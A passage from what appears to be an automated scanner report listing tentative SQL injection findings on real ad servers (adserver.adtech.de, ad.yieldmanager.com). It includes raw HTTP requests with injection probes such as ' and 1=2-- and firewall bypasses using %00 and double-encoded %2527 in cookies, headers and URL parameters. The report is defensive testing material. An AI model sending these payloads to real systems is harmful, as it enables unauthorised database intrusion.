GET /imp?Z=300x250&atf=1'%20and%201%3d2--%20&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=4187966827&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response 2

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:38 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0328.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:38 GMT
Pragma: no-cache
Content-Length: 1814
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<script type=\'text/javascript\' src=\'http://ad.turn.com/server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=26676525&ahcid=1883426&bimpd=fOK9nK5SBPNMFPSaVcmC2Wth1-bS6WqeAcIEhmtqe7rT8nINU3UZBQr9rcUhUA1N8cRt7-4qdvT1s921wLY5MvhJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14HnxF-CcwsJXwWAOdYeKznq8McqEAK-UmBlv3IIWyyUO3ZdHjZdUsAV-ly2h2S3imgukhFY036-UAkYbmGxOKupGFftJkIqwH9qF07DFDjClZLvv9Fj99WkgUM3N7Pk3wJLXqTBYYrDYXzyLBoFAQjyLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXul1BZwhrGK9kkKqWo_4Vc0HttRxMG_MxGL8BOWn5BaTgxnIpfRe_0nV8j-2uLFEcHGnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnG_9FK7pAJgs0CD0PsBjgu6xrB2q8vsB_pWw7eofVu65DMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhX3cv0bkaM0JpYmODU6vGPfofQ9TH1f1BuQDNWHQYeRUvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPhneywnUNb5R3ghoDZMAUmq5ZT6ApQ0N3A9ksY0B-eLzmL0jJk7x81x1HM4Bl65LQheFkuieZwAC6g7llKdWa2iLK1EaGuwAlEPUKyOoDOQbdT_c9SK2zNgw7l2BpfGmhLu_A45Cp_byU6Eng9JHpJukR3NLoNbrFznL6rSwUDyDC730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0088&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVTstugzAQ%2EBpuyAKbp1APTgwREY%2EQorbhgsA2IiU85FAF8fW1GtqeO1ppR7M7s6sjz9JhI0G5SRG1a%2DjpCFJb45VBXVXzPA%2DatmEgzXVt9RbuGE7H5XAnzhBm%2DBvE0n8oxsTBWfjQTw4GdwKAWbxHDwXX%2D%2Ei%2DmezsZaPb7H%2DNuM2zv1nkvS3qZGXpsoa736zDsU9Wfy0%2Dimv09toluT%2EHeXCN95qZkGMX5dQoctbF%2DXlJJT%2E%2EvfSkqu08TwrCCgxkMTCLivEFjBMfFkDHXopVI8DUyqVgHQd%2DYQoiFnJ1BVq0lvwy3LiYS1ENbOzL4bOvuShbLvgXrFBuYw%3D%3D%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere\'></script>');
var rm_data = new Object();
rm_data.creative_id = 8690940;
rm_data.offer_type = 3;
rm_data.entity_id = 424978;
if (window.rm_crex_data) {rm_crex_data.push(8690940);}

1.2. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [JEB2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID%00'; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2812308(i) {
var sVersion_2812308 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID%00''; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 592

document.write("\n");
var cb = Math.random();
var d = document;
var iframe = "&fr=" + (window != top);
var ref = "";
try {
if (window != top) {
ref = "&rf="+escape(d.referrer);
}
} catch (ignore) { }

...[SNIP]...

1.3. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH%2527;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2812308(i) {
var sVersion_2812308 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH%2527%2527;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 426

document.write("<scr"+"ipt src=\"http://tag.contextweb.com/TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934\">\n");
docum
...[SNIP]...

1.4. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816967(i) {
var sVersion_2816967 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1712

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.5. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1%00'
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816967(i) {
var sVersion_2816967 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1%00''
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 475

document.write('<a href="http://adserver.adtech.de/?adlink|327|2816967|0|168|AdId=6109713;BnId=3;itime=599414338;sub1=[subst];" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/17/Ad6109713S
...[SNIP]...

1.6. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [JEB2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID'; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816968(i) {
var sVersion_2816968 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID''; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1710

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.7. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH

Issue detail

The loc parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the loc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982'%20and%201%3d1--%20 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18913

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ion\")\r\n"+
"end if";
window.execScript(sVersion_2816968, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://store.nike.com/gb/en_gb/?l=shop,pdp,ctr-inline/cid-300/pid-406900&cp=EUNS_OT_FBJUL11_UK6";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=468 height=60";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/NikeSeitiroUK_468x60.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick=false;
var AT_LAYERMANUALRESIZE = false;
var AT_BASE="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/"; // Nachladepfad fuer Flash Filme (http://.../)
var AT_IMAGE="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/NikeSeitiroUk_468x60.gif";
var AT_TEXT="";
var AT_ALTIMAGEWIDTH = "468";
var AT_ALTIMAGEHEIGHT = "60";
var AT_ZINDEX = "0";
var AT_WMODE = "opaque";
var AT_EXPANDABLE="false"; // width:100px;height:70px; Zus?tzlich Fakepopup an position 0x0 machen
var AT_FAKEPOPUP=false;
var AT_FAKEPOPUP_left=100;
var AT_FAKEPOPUP_top=100;
var AT_FAKEPOPUP_autoclose='';
var AT_FAKEPOPUP_start_opened=true;
var AT_CURRENTDOMAIN= window.location.host;
var AT_VARSTRING;
//make variable names unique on page
var AT_MULTICLICK2816968=AT_MULTICLICK;
var AT_CLICK2816968=AT_CLICK;
var AT_TARGET2816968=AT_TARGET;
var AT_IMGCLICK2816968=AT_IMGCLICK;
AT_CLICKVAR[0]=AT_CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|327|2816968|
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982'%20and%201%3d2--%20 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ion\")\r\n"+
"end if";
window.execScript(sVersion_2816968, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://www.barclays.co.uk/footballoffset";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=468 height=60";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/OffsetMortgage_route1_468x60_v4.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick=false;
var AT_LAYERMANUALRESIZE = false;
var AT_BASE="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/"; // Nachladepfad fuer Flash Filme (http://.../)
var AT_IMAGE="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/OffsetMortgage_route1_468x60_Backup.gif";
var AT_TEXT="";
var AT_ALTIMAGEWIDTH = "468";
var AT_ALTIMAGEHEIGHT = "60";
var AT_ZINDEX = "0";
var AT_WMODE = "opaque";
var AT_EXPANDABLE="false"; // width:100px;height:70px; Zus?tzlich Fakepopup an position 0x0 machen
var AT_FAKEPOPUP=false;
var AT_FAKEPOPUP_left=100;
var AT_FAKEPOPUP_top=100;
var AT_FAKEPOPUP_autoclose='';
var AT_FAKEPOPUP_start_opened=true;
var AT_CURRENTDOMAIN= window.location.host;
var AT_VARSTRING;
//make variable names unique on page
var AT_MULTICLICK2816968=AT_MULTICLICK;
var AT_CLICK2816968=AT_CLICK;
var AT_TARGET2816968=AT_TARGET;
var AT_IMGCLICK2816968=AT_IMGCLICK;
AT_CLICKVAR[0]=AT_CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|327|2816968|0|1|AdId=6109710;BnId=115;
...[SNIP]...

1.8. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH

Issue detail

